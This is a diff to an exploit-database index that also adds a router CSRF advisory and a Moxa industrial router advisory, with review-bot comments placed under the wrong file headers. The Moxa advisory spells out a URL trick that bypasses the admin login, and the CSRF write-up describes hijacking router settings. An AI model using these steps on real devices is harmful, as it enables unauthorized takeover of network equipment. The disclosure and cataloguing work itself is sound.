@@ -34991,7 +34991,7 @@ id,file,description,date,author,platform,type,port
 38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos,0
 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0
 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0
-38630,platforms/php/webapps/38630.html,"phpVibe - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0
+38630,platforms/php/webapps/38630.html,"phpVibe 3.1 - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0
 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0
 38621,platforms/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0
 38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0
@@ -35059,7 +35059,7 @@ id,file,description,date,author,platform,type,port
 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0
 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0
 38694,platforms/windows/remote/38694.txt,"HTC Sync Manager - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0
-38695,platforms/php/webapps/38695.txt,"CakePHP - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0
+38695,platforms/php/webapps/38695.txt,"CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0
 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0
 38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0
 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps,0
@@ -35197,7 +35197,7 @@ id,file,description,date,author,platform,type,port
 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80
 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80
 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0
-38843,platforms/php/webapps/38843.txt,"TomatoCart - 'install/rpc.php' Local File Inclusion",2013-11-18,Esac,php,webapps,0
+38843,platforms/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion",2013-11-18,Esac,php,webapps,0
 38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0
 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0
 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps,0
@@ -35222,7 +35222,7 @@ id,file,description,date,author,platform,type,port
 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0
 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
-38865,platforms/php/webapps/38865.txt,"NeoBill - /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
+38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
@@ -35247,9 +35247,9 @@ id,file,description,date,author,platform,type,port
 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
 38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
 38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
-38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
-38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
-38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80
 38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0
 38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps,0
@@ -35276,9 +35276,9 @@ id,file,description,date,author,platform,type,port
 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0
 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0
 40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0
-38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
-38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
-38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
+38920,platforms/php/webapps/38920.txt,"AFCommerce - 'adblock.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
+38921,platforms/php/webapps/38921.txt,"AFCommerce - 'adminpassword.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
+38922,platforms/php/webapps/38922.txt,"AFCommerce - 'controlheader.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0
 38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0
 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80
@@ -35292,7 +35292,7 @@ id,file,description,date,author,platform,type,port
 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0
 38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0
 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0
-38938,platforms/php/webapps/38938.txt,"xBoard - 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0
+38938,platforms/php/webapps/38938.txt,"xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0
 38939,platforms/multiple/dos/38939.c,"VideoLAN VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0
 38940,platforms/multiple/dos/38940.c,"VideoLAN VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0
 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0
@@ -35385,7 +35385,7 @@ id,file,description,date,author,platform,type,port
 39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin)",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
-39032,platforms/php/webapps/39032.txt,"BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80
 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80
 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0
@@ -35446,7 +35446,7 @@ id,file,description,date,author,platform,type,port
 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0
 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0
 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
-39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
+39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - 'code.php' Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
 39100,platforms/php/webapps/39100.txt,"WordPress Plugin NextGEN Gallery - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0
 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0
 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0
@@ -35468,12 +35468,12 @@ id,file,description,date,author,platform,type,port
 39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0
-39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
+39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0
 39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0
-39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
+39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
 39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
@@ -35590,15 +35590,15 @@ id,file,description,date,author,platform,type,port 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39250,platforms/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 -39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 +39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 39252,platforms/php/webapps/39252.txt,"WordPress Plugin WP Rss Poster - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39253,platforms/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39254,platforms/php/webapps/39254.html,"WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39256,platforms/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 39257,platforms/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 -39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery",2014-07-16,"V. 
Paulikas",multiple,remote,0 -39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 
@@ -35612,7 +35612,7 @@ id,file,description,date,author,platform,type,port
 39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0
 39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0
 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
-39272,platforms/php/webapps/39272.txt,"CMSimple - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
+39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
@@ -35621,7 +35621,7 @@ id,file,description,date,author,platform,type,port
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0
 39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
 39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
-39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0
+39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps,0
 39282,platforms/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0
 39283,platforms/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0
 39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
@@ -36340,7 +36340,7 @@ id,file,description,date,author,platform,type,port
 40042,platforms/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80
 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443
-40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
+40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation",2016-07-03,vnik,linux,local,0
@@ -36391,7 +36391,7 @@ id,file,description,date,author,platform,type,port
 40181,platforms/linux/dos/40181.c,"AppArmor securityfs < 4.8 - aa_fs_seq_hash_show Reference Count Leak",2016-07-29,"Google Security Research",linux,dos,0
 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector",2016-07-29,Orwelllabs,linux,webapps,80
 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
-40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
+40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
@@ -36479,7 +36479,7 @@ id,file,description,date,author,platform,type,port
 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
-40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
+40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
@@ -36721,3 +36721,7 @@ id,file,description,date,author,platform,type,port
 40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
 40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
 40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
+40626,platforms/hardware/webapps/40626.txt,"Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery",2016-10-24,BlackMamba,hardware,webapps,0
+40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
+40628,platforms/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps,0
+40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0
diff --git a/platforms/hardware/webapps/40626.txt b/platforms/hardware/webapps/40626.txt
new file mode 100755
index 000000000..f0f753de5
--- /dev/null
+++ b/platforms/hardware/webapps/40626.txt
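Review bot: The four added index rows disagree with the files they point at: the 40627 row says only "Microsoft Windows (x86)" although the exploit header lists Windows XP SP3 and Server 2003 SP2 as the supported targets and the code refuses any other version, and the 40629 row omits the vendor name "Moxa" that the advisory's summary gives and credits "Sniper Pex" while the advisory itself names Nassim Asrir (possibly the submitter's handle, but the two should be reconciled). I would change the descriptions to `"Microsoft Windows XP SP3 / Server 2003 SP2 (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)"` and `"Moxa EDR-810 / EDR-G902 / EDR-G903 Industrial Secure Routers - Insecure Configuration Management"`. The 40628 path ends in `.pl`, but the file body is Ruby (`require('mechanize')`, `Mechanize.new()`), so the path should be updated once the file is renamed to `40628.rb`.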
@@ -0,0 +1,28 @@
+# Exploit Title: Orange Inventel LiveBox CSRF
+# Google Dork: N/A
+# Date: 10-24-2016
+# Exploit Author: BlackMamba TEAM (BM1)
+# Vendor Homepage: N/A
+# Version: Inventel - v5.08.3-sp
+# Tested on: Windows 7 64bit
+# CVE : N/A
+# Category: Hardware
+
+1. Description
+This Router is vulnerable to Cross Site Request Forgery , a hacker can send a well crafted link or well crafted web page(see the POC) to the administrator.
+and thus change the admin password (without the need to know the old one).
+this affects the other settings too (SSID name , SSID Security ,enabling disabling the firewall.......).
+
+2. Proof of Concept
+this link once clicked the admin password is changed to "blackmamba" (withouth ")
+
+Cats !!!
+
+this link once clicked sets the SSID to "BLACKMAMBA" with the security to NONE (open wirless network)
+Dogs :D !!!
+
+3. Mitigation
+this is kinda obvious but DO NOT click on links you can't verify there origine specialy when connected to the Router's interface.
+
+------------------------------------------------------------------------------------------------------------------------------------------------------------
+From the Moroccan team : BLACK MAMBA (by BM1)
diff --git a/platforms/hardware/webapps/40629.txt b/platforms/hardware/webapps/40629.txt
new file mode 100755
index 000000000..2fdcf9bca
--- /dev/null
+++ b/platforms/hardware/webapps/40629.txt
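Review bot: The Proof of Concept section does not contain the requests it describes — only the anchor texts `Cats !!!` and `Dogs :D !!!` survive, so the request that sets the password to "blackmamba" and the one that opens the SSID cannot be reproduced from this file; the HTML links were presumably stripped when the advisory was pasted and should be restored as plain text (method, path and parameters). The Mitigation section only tells users not to click links; it should also name the fix the device needs — an anti-CSRF token or Origin/Referer check on the configuration handlers, and requiring the current password before a password change, since the description says the old one is not needed. With `Vendor Homepage: N/A`, `CVE : N/A` and no disclosure timeline a reader cannot tell whether Orange was notified, so a one-line vendor-contact status would help.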
@@ -0,0 +1,38 @@
+Title: Industrial Secure Routers - Insecure Configuration Management
+Type: Local/Remote
+Author: Nassim Asrir
+Author Company: HenceForth
+Impact: Insecure Configuration Management
+Risk: (4/5)
+Release Date: 22.10.2016
+
+Summary:
+Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions.
+The EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically
+designed for automation networks,which protects the integrity of remote access and critical devices.
+
+description:
+
+Using this Vulnerability we can change the Admin configuration without knowing Password & Username
+
+Because the form for change the configurations is Insecure.
+
+Vendor:
+http://www.moxa.com/product/Industrial_Secure_Routers.htm
+
+Affected Version:
+EDR-810, EDR-G902 and EDR-G903
+
+Tested On:
+Linux // Dist (Bugtraq 2)
+
+Vendor Status:
+I told them and i wait for the answer.
+
+PoC:
+- when you navigate the server automatically you redirect to the login page (http://site/login.asp).
+
+- so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations.
+
+Credits
+Vulnerability discovered by Nassim Asrir -
\ No newline at end of file
diff --git a/platforms/php/webapps/40628.pl b/platforms/php/webapps/40628.pl
new file mode 100755
index 000000000..3cee6f9cb
--- /dev/null
+++ b/platforms/php/webapps/40628.pl
